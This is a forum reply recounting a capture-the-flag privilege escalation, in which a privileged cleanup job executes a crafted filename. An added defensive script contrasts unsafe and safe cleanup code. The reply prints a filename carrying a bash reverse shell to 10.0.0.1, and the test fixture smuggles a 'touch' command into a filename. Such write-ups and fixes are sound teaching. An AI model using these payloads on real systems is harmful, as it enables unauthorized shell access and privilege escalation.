Re: Broken NFS
Everything old is new again. Working on a CTF in Hack The Box, I had a reverse shell but couldn't really do anything with it. There was only one log directory that was writeable, but I eventually figured out there was a cleanup job that deleted the files. By creating a filename with shell characters in it, I was able to get command execution with higher privileges when that process ran by naming the files something like:
hello.c; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
The hard part was figuring out how to get the special characters in the name. I don't remember what I had to do, but it can definitely be done.
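
The cleanup-job weakness described in the post above, seen from the fixing side. This is an added example, not part of the original post: the function names, the directory layout and the marker file INJECTED are constructed for illustration, and the hostile name only creates a marker so the effect can be observed.

```shell
#!/bin/sh
# Added example: a privileged log-cleanup job written two ways.
# All names here (cleanup_unsafe, cleanup_safe, run_case, INJECTED) are hypothetical.

# Unsafe: the filename is pasted into a string that a shell then parses,
# so ';' and other metacharacters in the name become shell syntax.
cleanup_unsafe() {
    dir=$1
    for f in "$dir"/*; do
        [ -e "$f" ] || continue
        sh -c "rm -f $f"
    done
}

# Safe: find hands each name to rm as one argv entry; no shell ever parses it.
# '--' stops option parsing in case a name starts with '-'.
cleanup_safe() {
    dir=$1
    find "$dir" -type f -exec rm -f -- {} +
}

# Run one variant against a fresh, constructed fixture.
# Prints "injected" if the filename was executed as a command, else "clean".
run_case() {
    variant=$1
    base=$(mktemp -d) || return 1
    mkdir "$base/logs"
    : > "$base/logs/app.log"
    : > "$base/logs/hello.c; touch INJECTED"   # constructed hostile filename
    ( cd "$base" && "$variant" logs ) >/dev/null 2>&1
    if [ -e "$base/INJECTED" ]; then
        echo injected
    else
        echo clean
    fi
    rm -rf "$base"
}

echo "unsafe cleanup: $(run_case cleanup_unsafe)"
echo "safe cleanup:   $(run_case cleanup_safe)"
```

The unsafe variant also leaves the hostile file in place, because the shell splits its name and rm is asked to delete a different path. A job like this should additionally run with the least privilege that still lets it delete from the directory it cleans.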